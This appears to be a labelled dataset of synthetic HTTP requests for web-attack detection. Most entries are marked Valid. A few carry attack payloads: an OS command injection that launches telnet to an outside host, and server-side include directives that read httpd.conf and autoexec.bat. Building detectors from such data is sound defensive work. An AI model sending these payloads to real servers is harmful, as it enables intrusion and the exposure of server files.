GET /eUilpe2altfg0yeehIc/eEseeeNtncaaNhstst.shtml?tgit0tsi=9612552&paotioxlw=sebcmogfprcatir HTTP/1.0
Host: www.t0tRN.gov
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.2, gzip;q=0.0, gzip;q=0.1, gzip;q=0.6
Accept-Language: mtao-ett0tBd, 4urneF-Etienba;q=0.6, inno6uk-oc8;q=0.5, Tdnzii-r;q=0.9, e-amtc8k;q=0.9
Cache-Control: only-if-cached
Client-ip: 84.83.204.254
Cookie: sq7eyH9=pfuyutst;fT=t mq
Cookie2: $Version="955"
Date: Sat, 14 Aug 04 10:12:30 CET
ETag: "rMdLeei2EugdD8@C0K"
Expect: 100-continue
From: rrss18n@ElE01poue.cz
If-Modified-Since: Tue, 30 Oct 07 16:22:10 UTC
If-Unmodified-Since: Sun, 15 Jul 07 15:38:39 GMT
If-Match: "edr1tf2TvoVnYaHFq2"
If-None-Match: *
If-Range: Fri, 31 Jul 09 10:44:14 UTC
Max-Forwards: 3
MIME-Version: 6.8
Pragma: ard='5n'
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM YW9zZWxhYXMzVG5oNVRzZW51aWV0OWVhZUFvbTBqYXM2YXM=
Range: -709
Referer: /rnliyFa/hee9madT.asmx
TE: chunked;q=0.9,trailers
Trailer: If-Match
User-Agent: n63teE (tYp08@T0; aR4rjcJ; aV9P9hy; o.1URkqfmT)
UA-CPU: PowerPC
UA-Disp: 092,1496,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6040x9780
Via: tne/9.8 140.133.1.4:628, 7.9 107.186.33.194
Transfer-Encoding: deflate
Upgrade: coiqe/9.7, 2su/5.0, e5rlaa/0.2
Warning: 657 www.eectT.tiff "bhbEo" "Thu, 20 Oct 05 17:31:15 UTC"
X-Forwarded-For: 84.26.195.189
X-Serial-Number: 326327
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1238
Start - Id: 31287
class: Valid
GET /ot144_KN.x/sL0ti8yaRetth/ite/loh9/712WL6gwXRQQvc/1uudlAc/n.B/eXfRmuK/s_jELMbxBWmuC/ooVKhm9-DqpT@@SMg5KX/15UkV7S-Hi5bzN50Ub/amv5vulBoEdU.shtml? HTTP/1.1
Host: 34.52.56.29
Connection: iyhg
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 107.78.34.245
Cookie: TRjomailhmetcwE=ai;En7ioD89Oxhaal=ai'a+8s[eatxe;eUT-ERTyI=h76jRaollud;wWmAu7=3488862413;ahTxsdtsiim=71
Cookie2: $Version="4"
Date: Thu, 03 Apr 08 05:42:35 UTC
ETag: "lCT_GUX46BwiQ765a"
Expect: dnonxao
From: Jaodie@trvhtsHeY.ch
If-Modified-Since: Tue, 02 Feb 10 12:05:05 UTC
If-Unmodified-Since: Sun, 17 Apr 05 07:41:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 8.7
Pragma: o='Louedn2e'
Proxy-Authorization: Digest response="57BDdf1DBA67734eB88F9d60DBd482BC"
Authorization: uzOsnr eorhnng=Yo4aOvk
Range: -388719
Referer: http://rbu5is5e.org/hsdtptve/9szufsm/xiolaen.tar.gz
TE: chunked;q=0.8,deflate;q=0.7
Trailer: Expect
User-Agent: Mozilla/3.4 (compatible; MSIE 3.8; SunOS sun4u; odelDa; Gemnn8day; sdeiee)
UA-CPU: Sparc
UA-Disp: 5325,2370,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3795x126
Via: ded/2.7 www.sNsoe.gif
Transfer-Encoding: compress
Upgrade: GorsU/6.8
Warning: 321 www.eor2Lmo.js "uenlgbdrgd" "Thu, 25 Sep 08 14:31:46 CET"
X-Forwarded-For: 45.216.230.89
X-Serial-Number: 27483217
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31287
Start - Id: 13596
class: Valid
GET /_iDOWIo5oYC3b/ter_W/DZrgge7hyr7ign/kdS.asp?lttzRstmsg=20555&plIbrbmsoanssm=s5Buwindow.open&tiirtshvSjeciat=3096&e2@g=93470&alOGhsvxb=6708&ruttsenynealt=telnetdaw&u77hcmd=tholiae&6f=1&hGgPW=OmReriNTw2jdo&nl8lcRbipths=2TcPeiti HTTP/1.1
Host: 197.49.48.50
Connection: close
Accept: audio/x-wav;q=0.7, text/*
Accept-Charset: iso-8859-1;q=0.2, koi8, iso-8859-8-i, utf-7;q=0.1
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 162.62.214.21
Cookie: elMgell=49tqan9p]lin
Cookie2: $Version="845"
Date: Wed, 12 Sep 07 18:56:55 CET
ETag: "m4CeWrYrl5LTZ3J6N9"
Expect: tntewoon
From: issst@tutqrpd.biz
If-Modified-Since: Mon, 01 Feb 10 01:43:33 UTC
If-Unmodified-Since: Tue, 16 Oct 07 11:02:16 CET
If-Match: "8haTkWnje2ixW1BUd90"
If-None-Match: "XYt9r1aIgp.OL8PIsJ"
If-Range: *
Max-Forwards: 939
MIME-Version: 2.7
Pragma: TAru='eu'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: NTLM djh2N3VoNTZuZGg3dWx0ZHNuc2tlbmVzb2Jpc3V2ZjRsbnNuZWlvb2Vs
Range: 8-93898,-3983,-5248
Referer: http://www.Sdncn.net/fle1/ttgqli/nNoo.ace
TE: chunked,chunked
Trailer: If-Match
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 7.3; te-aq; rv:9.9.3) Gecko/55041028
UA-CPU: StrongARM
UA-Disp: 896,6607,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/3.0 4.17.133.211, FTP/6.7 181.179.63.251, 3.7 www.ycsrydeo.htm
Transfer-Encoding: deflate
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 604 www.ireeteni.js "iustbs" "Wed, 09 Sep 09 12:42:12 GMT"
X-Forwarded-For: 124.212.119.141
X-Serial-Number: 70032554284651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13596
Start - Id: 36809
class: OsCommanding
GET /QCcmdh4_zxWsbRyy/uhf9UW/7TUM_kPm6pdk1ae4R/xVq@GAIU.mdb?fiv7ivrarsontys=%5C%22++++%5C%3B++++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.atiltosi.com+++54+++%3B&oE4@wdivH46ZH=e4gEhr%3E3%7Ce+&4toieete4=i&iheoa=mt2temeark&VkBNb2VGZ=bfolYnyhtet4snneIk&aIe4llnr=36&himjaiit=44519932&kaiC=ls9eajaqin&RWQ58qx=rngnae&W_tNzSVOf=754&zluand=5&fl78ongt=2%3C HTTP/1.1
Host: 242.147.38.148
Connection: keep-alive
Accept: application/zip, video/quicktime;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Cookie: lapoa=03711;tn26nete5r=niswon>Astn(y)l'ewphps;a.R_havingphpvXpmail=Dhh2usangSmochaM2q;eOdm38zitNheb3T=72
Cookie2: $Version="1"
Date: Fri, 07 Jul 06 05:29:42 UTC
ETag: W/"f.AsugJAgysLA_ZZECY"
Expect: 100-continue
If-Modified-Since: Mon, 24 Nov 08 04:13:38 GMT
If-Unmodified-Since: Tue, 15 Nov 05 17:52:24 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 5568
Pragma: no-cache
Authorization: Basic SGluaDpzaWN0bw==
Referer: http://www.Mv4acabM.de/khnpite/psiZlly/sb8e3Ens/ahcHoD.txt
TE: gzip;q=0.8,trailers
User-Agent: oTb9@Li http://www.enoqoed.net
UA-CPU: Sparc
UA-Color: color8
Via: 2.6 250.177.193.196, hey/5.7 75.118.149.67, HTTP/1.2 www.mneoTepl.jpg
Transfer-Encoding: identity
----: ---------------

null

End - Id: 36809
Start - Id: 17402
class: Valid
GET /mhNutexae/tnok3/tL372/i8Cjkrzi6L8wI/j8eoln9i72hdtEooia/r9sdhue/wkpvYfu@b5F/nYs42slsnUvRtllt/f4WeLJOiMn0/iaf.bin?acceptAWZ-9=oMdgXbMitf&rusll4pkmuSm=di7&afkioo=5&Biefdy=ayc&amutsaobouue=ylefurt%29Uss+l4&Dpiah=ogrpseeofslrzNrhl&unnri=9&ci=aeWilStvwo&rnneerge=004287&njdoeemt=bl%3A&tito9flN=3&mVziqM=t%3Fci HTTP/1.0
Host: www.tefDtki.net
Connection: lmdt
Accept: video/mpeg, video/*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.7, identity, identity;q=0.8
Accept-Language: *
Cache-Control: max-stale=44
Client-ip: 216.172.88.176
Cookie: G4Hrr6M=Hi8ti$ht2;Sbn=$~o
Cookie2: $Version="155"
Date: Thu, 23 Aug 07 12:47:25 GMT
ETag: "z4Z4bHKFVo@_OqY"
Expect: 100-continue
From: hErN7au@nLt0ryhez.uk
If-Modified-Since: Mon, 09 Mar 09 22:51:00 UTC
If-Unmodified-Since: Sun, 12 Nov 06 10:08:12 UTC
If-Match: "dXub@sX_8EZLCCqRzz0"
If-None-Match: *
If-Range: Sun, 31 Jul 05 23:22:16 CET
Max-Forwards: 06
MIME-Version: 4.7
Pragma: e=etatarpw
Proxy-Authorization: NTLM ZWFubGU1aGUwOXJucmFyYXNwSGNvaGEwc2JhQmlvb05wSWVycWJlQWQ=
Authorization: t6xg vnemu=gNfea
Range: -29
Referer: /tbpses.mspx
TE: trailers
Trailer: Cache-Control
User-Agent: rdnw9wbt/8.3
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 429x433
Via: HTTP/3.0 55.116.228.144, FTP/0.1 142.173.8.119:535, 5.3 230.95.222.156
Transfer-Encoding: compress
Upgrade: erw/4.0, sapde/3.7, pa5e/2.8, u1osod/3.8, getnE/3.2
Warning: 488 54.214.214.196 "HhogTchdesoreaenss" "Thu, 26 Jun 08 12:34:53 CET"
X-Forwarded-For: 233.13.162.49
X-Serial-Number: 534036492924791
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17402
Start - Id: 17423
class: Valid
GET /eEDK/wMWMZ/4lrymXjAepV_T9UgQu/oIaxZwYDW8-C89v/nfseyi/etl1/9optu1Zq/hNzV@U_.aspx?FdbKFn=1fJiG&poAs=iaika&azE=alagtaiadndptouuo&4WhcaEf2=omOs&aroug90Re=%7EscOototf+2&iesererer=tAnmk1nceeae%7Ch&8xtw=ol+zDgelind HTTP/1.1
Host: www.7datrgrl.gov
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip;q=0.1, deflate;q=0.3, identity;q=0.1
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 170.148.124.221
Cookie: agumpetsele=9053;@mIaDOUMNV=hoeopt;asbkl=ezs3bdre
Cookie2: $Version="393"
Date: Tue, 02 Mar 04 23:53:38 GMT
ETag: "e5d8ok3_mJE_zsChVQxZ"
Expect: 100-continue
From: asobeo@yaOtdneg.de
If-Modified-Since: Fri, 08 Feb 08 03:25:49 CET
If-Unmodified-Since: Mon, 28 Mar 05 23:13:10 UTC
If-Match: *
If-None-Match: "VSlbEbLlrrSnqqq"
If-Range: Wed, 01 Oct 08 18:53:09 CET
Max-Forwards: 7921
MIME-Version: 8.5
Pragma: d4rlz=1xd0un3c
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Basic aWZyaGlvY246eGllc2Fh
Range: 029142-,923181-099
Referer: http://www.prai.be/itfay/n0diA0w/netagmag.jpg
TE: trailers
Trailer: If-Match
User-Agent: tyvTq (n2SS.5; y54ot69r; gEJaO7j; o1EN4s; tBATo-IB)
UA-CPU: 68000
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 429x433
Via: a5F/6.8 www.oc2ufmds.gif, pa65et/2.1 www.ieh1.htm
Transfer-Encoding: f341g; IBondgnN=Aowwnetk
Upgrade: IoLudo/1.8, eemrri/8.1, aol/1.5
Warning: 682 www.8mri.png "1onheHntbcn" "Fri, 11 Dec 09 19:10:46 CET"
X-Forwarded-For: 161.13.62.114
X-Serial-Number: 891452454
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17423
Start - Id: 29983
class: Valid
GET /KJmkbHKc.msf?3Obfgswiawlenn=078&s1knHdJh=replacehttpu&r7qsh6efelbncnh=3llerrno4q2&rwlo=l2l%29&sdhex=tspshUEe&m6we2DsjlltrTas=mCYO&bCDwaeMefiov=or9sehue&xt=uZ_-lmTQe-ab HTTP/1.1
Host: 75.83.155.190
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-1;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: E='giOta0'
Client-ip: 26.168.29.0
Cookie: aho=steurRr;connecthtaccesW1M8tlsWY=forpi
Cookie2: $Version="308"
Date: Tue, 21 Feb 06 06:27:36 GMT
ETag: "bibmdyuKcRpl1LGBjwPa"
Expect: oAlen
From: h2entn@Tho3eeri.com
If-Modified-Since: Tue, 18 Mar 08 05:02:17 CET
If-Unmodified-Since: Sat, 15 Jul 06 15:57:27 UTC
If-Match: "qHtza7M5g04qLugihuBX"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 0.1
Pragma: sunTue7l=j
Proxy-Authorization: rrrf natgEri=u7aTNgi8
Authorization: NTLM VG10YWJ3aXRlYXJmZW5pVHd0Y3MyZW02aWVhc2Vtb0l1c3JlY3J0aXBmbml5aXI=
Range: 89712-
Referer: http://www.Af1I.uk/x0nehn/erruoh/nvrwfe/dsesjh/a4ou.exe
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: 5zVfLoM http://www.edtaiiim.it
UA-CPU: StrongARM
UA-Disp: 644,8528,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 912x832
Via: Mvhvta/8.8 www.pde7aca.gif, 6.3 255.134.155.227, 1.0 www.etcfa2.css
Transfer-Encoding: compress
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 69.246.154.213
X-Serial-Number: 2857393
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29983
Start - Id: 5367
class: Valid
POST /ab5mK8m6/re6taa/iedps7tiihop/ttt2nasf2ta/nI/Zflink3NtxtermWl/eoTADJVIBO5K8HLckV7.tiff? HTTP/1.0
Content-Length: 254
Content-Language: oeziol7
Content-Encoding: compress
Content-Location: /ee2nor/ee3ha6t/j6ab/gdI8do/ohoguj.jsp
Content-MD5: YW9lSHJ0c3RoaWRoaHRlTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 21 Sep 04 17:36:04 UTC
Last-Modified: Fri, 11 Jan 08 12:10:04 UTC
Host: www.ndtr1.de
Connection: keep-alive
Accept: text/html, video/mpeg;q=0.4
Accept-Charset: windows-1254, iso-8859-5, windows-1258, windows-1253;q=0.3, ks_c_5601-1987;q=0.5
Accept-Encoding: gzip, identity
Accept-Language: *;q=0.7
Cache-Control: max-age=87
Client-ip: 76.136.239.56
Cookie: sh5IeQteZtut=mio3ai;ageht0edaDeudhr=362082830;143oeqU1she4tcs=epWS
Cookie2: $Version="58"
Date: Mon, 14 May 07 12:37:12 UTC
ETag: W/"1nwTTBGlV546DVg4"
Expect: 100-continue
From: 91ean@e9cutenhT7.cz
If-Modified-Since: Mon, 17 Apr 06 22:27:42 CET
If-Unmodified-Since: Fri, 30 Jan 04 05:28:49 GMT
If-Match: *
If-None-Match: *
If-Range: "Wq2Zu@-Q4gvpG@BwZQj"
Max-Forwards: 8
MIME-Version: 9.7
Pragma: ldeaUBra='gufoonE'
Proxy-Authorization: Digest response="fd8dEEba5EdDB19dA6Bc0aEFEF4BbD26"
Authorization: Basic b3I0dDpuaGdp
Range: 90-23,76962-
Referer: /dbrh/Gsasp.asp
TE: deflate,trailers,gzip
Trailer: Pragma
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 4.4; o4-le; rv:5.3.7) Gecko/68445067
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3820x055
Via: HTTP/8.2 www.ceoy.js:13364, HTTP/3.3 www.obnhi.html, exer/5.1 www.rs1qaT.jpg
Transfer-Encoding: compress
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 028740747069773
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

yeaePh5a=dssch0hryenoaub&beLbts4hoaa4nSS=jWQa&uai=7537329&naHcolcsi1=88519&rtiHothsehsea=7545356726&3ssare0deu=1Adn&amutoxbtisrvIao=t70A&qweteolwfsL=71187762&3Opr=00465&nnou=9504572541&oioe=6043738978&wT=iry7tiitraosidae&todtds=ynotdocumentperlrRdLuavmpy

End - Id: 5367
Start - Id: 39848
class: SSI
PUT /t4ZGSm1Pn/hstsqeseeab/aMfdXtHK/ldWO3yOJ.aspx? HTTP/1.0
Content-Length: 25
Content-Language: cd,lspu,cia
Content-Encoding: identity
Content-Location: http://92rmlqA6.gov/c5wg.asp
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 30 Aug 09 04:32:37 CET
Host: www.muQqeaior.it
Connection: snczr
Accept: video/quicktime;q=0.9
Accept-Charset: x-mac-japanese, iso-8859-5;q=0.9, x-mac-arabic, iso-10646-ucs-2;q=0.7
Accept-Language: da2mru-77
Cache-Control: no-transform
Cookie: 2ot=icMsL966eR;roi4ipro=eUateeNateo;espsmR4Hit=<!--     #include   virtual="/etc/httpd/httpd.conf"    -->;eg3tttoi=eeyl.I-3
Date: Sat, 25 Nov 06 15:54:39 UTC
If-Modified-Since: Fri, 09 Jan 09 17:18:03 UTC
If-Unmodified-Since: Mon, 17 Oct 05 18:53:22 CET
If-Match: "sm1h-3VhZcwehVnl"
If-None-Match: "QUdcXWGESIUc6tclUTK9"
Max-Forwards: 7
MIME-Version: 6.8
Pragma: st=tbqs
Authorization: Digest opaque="ctws"
Referer: /Drnt9ltt/woseohsi.css
User-Agent: dbowmRrib (jc@.kgYZ; oRZKGUywCY; tovzTW)
Via: HTTP/1.0 www.eolqg8.htm, FTP/9.3 215.38.242.191:565, 1.6 214.201.196.15

sriykhltfervhlw=T2qyh(u

End - Id: 39848
Start - Id: 4205
class: Valid
POST /wifhda/-gJMTy%u-TqXpt/ntU3Z7yzJ/iob82e/fw/i0nkD4zdNIW_PAyXFYQ.cgi? HTTP/1.0
Content-Length: 167
Content-Language: lTertar0,uCZ1TstN
Content-Encoding: deflate
Content-Location: http://www.zalae.fr/3xdto/ox6gel.asp
Content-MD5: dGVoZXZzY3NienlvM3JhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 24:15:52 GMT
Last-Modified: Thu, 14 Jun 07 19:19:07 CET
Host: www.Fafmn.cz
Connection: keep-alive
Accept: audio/*;q=0.5, audio/x-wav;q=0.7, image/png;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: elxgni-z5hinh;q=0.5, penM-9s, lhabwol-Iutup;q=0.2, sdnrbii-g
Cache-Control: no-cache
Client-ip: 139.195.254.48
Cookie: nigrdiereiwa=s\c
Cookie2: $Version="26"
Date: Sun, 19 Sep 04 01:27:08 GMT
ETag: W/"lL.dSWFCnb0m-O_iW7P"
Expect: 100-continue
From: tewe@gFoteninnd.com
If-Modified-Since: Sat, 29 Nov 08 15:30:11 CET
If-Unmodified-Since: Thu, 17 Mar 05 13:07:17 CET
If-Match: *
If-None-Match: "_Yms2WuL-G5.z@h"
If-Range: *
Max-Forwards: 9906
MIME-Version: 3.1
Pragma: sreon6=sfennfc
Proxy-Authorization: Digest cnonce="ys6ahg"
Authorization: Digest algorithm=1sasp4o
Range: 2-,878-,561480-5
Referer: http://www.4Siyehi.it/eEereUcl/Iger/eA9xgoni.jpg
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 9.5; et-aD; rv:6.4.9) Gecko/25219780
UA-CPU: x86
UA-Disp: 505,4605,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.7 242.41.23.214
Transfer-Encoding: identity
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

m2nidttav=13986037&xo9ahmwn6e=nctsraynkque~t&letea=5619923&ontmd=jcnn2es4oee&-jpY=deo&euzV7etcSxVza=qwhere~oT Teo9i&l5YY-gjhZpbodyZ=eauHuthhenlns2bmt&YvlLCPx=lv.hO

End - Id: 4205
Start - Id: 1018
class: Valid
GET /t7o/smf_cXIo/hes0ugua1ttrmeroia/vttpndOfeimpeme2/lrhFieth2I70/oynetaumenEtay4ja/jjs0rT/tcf/exZ@tC72He/ZTdiv3ZuQbhlsh.jpeg? HTTP/1.1
Host: 168.189.241.111
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: es-Mdvg, d-saesNk
Cache-Control: max-stale
Client-ip: 113.11.66.85
Cookie: geynaiYsdmss=tntjpeqoortzesghe;s3e=74279992;aee=nN5
Cookie2: $Version="0"
Date: Mon, 21 Aug 06 05:19:53 CET
ETag: "guQP-vgLmi_nEuJ8"
Expect: eiBh=zY66;as3us
From: iyiqd@OJte.cz
If-Modified-Since: Thu, 27 Apr 06 20:34:22 CET
If-Unmodified-Since: Sat, 08 Jan 05 20:43:30 UTC
If-Match: *
If-None-Match: *
If-Range: "wjCipmjEuTpZWScM"
Max-Forwards: 804
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Basic aXNqdWU6b2hhZWlhc2M=
Authorization: Digest algorithm=MD5
Range: 9-72361,672405-
Referer: http://www.ocphe.be/sSuFes1.mdb
TE: trailers
Trailer: If-Modified-Since
User-Agent: irlsiwc4uWto
UA-CPU: x86
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5033x777
Via: 9.7 www.7sEslgr.jpeg:4, 0.5 www.bfljhe7y.gif, FTP/6.2 123.121.14.98
Transfer-Encoding: isre
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 626 www.sIhu.js:02385 "3Foepetu3EnniiehE" "Sun, 13 Feb 05 14:48:31 UTC"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 90115734669182651364
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1018
Start - Id: 734
class: Valid
GET /c7GmtVOVZu9/lnnfypaapKicahl58/ioepabiswCs/a-pZwG-1allNQlocationjv.asmx? HTTP/1.1
Host: www.TliShm.uk:80
Connection: erya
Accept: application/*;q=0.7
Accept-Charset: utf-8;q=0.4, utf-8, windows-1257;q=0.8
Accept-Encoding: *;q=0.1
Accept-Language: d3w5ee-oo;q=0.7, ndm-y;q=0.5
Cache-Control: max-age=274
Client-ip: 4.184.115.67
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="670"
Date: Sun, 09 Apr 06 06:43:12 UTC
ETag: "mXqzusF5UMEWVN9kjdqZ"
Expect: 100-continue
From: eet5ayi@trifo.it
If-Modified-Since: Tue, 10 Apr 07 02:30:25 UTC
If-Unmodified-Since: Wed, 21 Sep 05 13:56:22 CET
If-Match: *
If-None-Match: *
If-Range: "2yVMuxgdm_@XqSs"
Max-Forwards: 5
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: riett grerxIas=LSauaaO
Authorization: Digest username="oiyt"
Range: -523,85-12956,5-
Referer: http://xtnYsr.net/tt0at/rgsjini/eZivge/egbRh/cdu1t59i.mspx
TE: chunked
Trailer: Cache-Control
User-Agent: nxiupqwoac (hYG.VSXIS; iibzr0Hx; esR3k3W4i5; elTg.FR7Ex; rb7dHx)
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 180x0493
Via: 6.3 21.32.31.31, HTTP/1.9 www.ahuate.jpeg
Transfer-Encoding: deflate
Upgrade: 3hE/0.4, uhza/1.9
Warning: 247 www.6atoou9u.css:82615 "7ySec6LYstptsi" 
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 734
Start - Id: 40494
class: SSI
GET /47DLn9N_f8x/hKATRoontawLsrr0dd/sd7TmG.PQY/iCs31/ucvc/zQ2DN..cfm?coRB9N=%3C%21--++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E HTTP/1.0
Host: 82.235.230.155:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: iy-btr;q=0.2
Cache-Control: min-fresh=70998
Client-ip: 172.243.224.10
Cookie: euler=anWkX;qclea7idbfnA=0809
Cookie2: $Version="148"
Date: Thu, 03 Feb 05 12:19:01 GMT
ETag: "h8t2lCbAJ.hMWV1Or"
Expect: tHds
From: aqel@uheesuh.cz
If-Modified-Since: Fri, 20 Mar 09 10:51:05 CET
If-Unmodified-Since: Wed, 20 Jan 10 09:44:46 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6203
MIME-Version: 2.7
Pragma: tse=e8i9oshe
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: qiee is3OjGer=ao7snt
Range: -843411,20269-
Referer: /Xw5srnea.tiff
TE: trailers
Trailer: Warning
User-Agent: Mozilla/3.2 (X11; U; Open BSD i386 7.3; a6-ei; rv:5.1.9) Gecko/36372824
UA-CPU: x86
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0287x026
Via: HTTP/7.8 226.209.142.77:4, FTP/4.7 www.nesd.jpg, FTP/8.9 www.rdIo5eam.html
Transfer-Encoding: compress
Upgrade: eiHn/0.0, mn7n9/4.3, Nko/4.4, wda/1.3, 7itb/8.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40494
Start - Id: 21303
class: Valid
GET /abebserhrkMolo/q3/oJsp/ir5ds7bi/aK6munhez0m/e9k7.hFtHyu.H/n8wuGDsH6Du_v25.nsf?dCarte4iyh=eebuthedE1&SOgdo8rlnm=vfAddr6gan&y3oe22=ao&bZozre=thrprocessing-instruction&rtsdnstrhwniltE=2607512878&iraoreTEg4eo=+&ityoj=le1 HTTP/1.0
Host: www.8o6ha0asho.st
Connection: 3sqdoj
Accept: text/*, text/html;q=0.8, video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 130.22.25.249
Cookie: lriqssgd=unionQdl/ng 
Cookie2: $Version="793"
Date: Sat, 26 Dec 09 03:09:30 GMT
ETag: "TGlCpO2QRbtWoKg"
Expect: 100-continue
From: aMuwze@s4ddbiH.ch
If-Modified-Since: Tue, 06 May 08 05:11:15 CET
If-Unmodified-Since: Wed, 09 Jul 08 12:20:50 GMT
If-Match: "mVb2xtgQ-h_pIWZEsdi"
If-None-Match: *
If-Range: Thu, 01 Jan 09 16:52:51 GMT
Max-Forwards: 7778
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: NTLM T2VhbmFpbm05Y2hydW43d3BBZUpsZWNvYnIxN3JyTWZubmh5U2FlN0V0ZW94d3Q=
Authorization: dnmtt aieee4A=oegr
Range: 863-
Referer: http://www.mtnia.fr/lnhseeH.gz
TE: chunked;q=0.7,trailers,gzip;q=0.2
Trailer: Trailer
User-Agent: evw0a/4.2.9
UA-CPU: PowerPC
UA-Disp: 698,349,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6998x4175
Via: 3.3 37.64.192.90
Transfer-Encoding: deflate
Upgrade: sgazls/3.2, aet/0.4
Warning: 220 20.74.85.15:047 "seLtmobona" 
X-Forwarded-For: 56.53.73.85
X-Serial-Number: 2418413
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21303
Start - Id: 29118
class: Valid
